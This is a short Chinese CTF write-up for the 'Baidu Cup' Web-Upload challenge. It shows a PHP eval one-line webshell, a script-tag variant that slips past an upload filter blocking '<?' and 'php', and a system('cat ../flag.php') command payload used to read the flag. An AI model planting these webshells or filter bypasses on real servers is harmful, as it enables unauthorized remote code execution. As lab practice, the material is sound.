“百度杯” CTF比赛 九月场 Web-Upload

访问题目网址

在这里插入图片描述

解题思路

  • 习惯性查看源码,无收获

  • 按要求上传一张Upload.png,显示上传成功,并且返回上传位置:u/Upload.png,可正常访问。

  • 上传php一句话木马<?php @eval($_POST['cmd']);?>,显示上传成功,访问发现显示@eval($_POST['cmd']);?>,测试发现过滤了<? php

  • 使用php长标签和PHP绕过过滤,重新上传。

      <script language='PHP'>
      @eval($_POST[cmd]);
      </script> 
    
  • 上传成功,菜刀连接,在根目录下看到flag.php,打开即可获得flag。
    不想通过菜刀连接也可以通过构造cmd=system('cat ../flag.php');,查看源码即可获得flag。

================================================================

小白成长记,大佬请指点。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值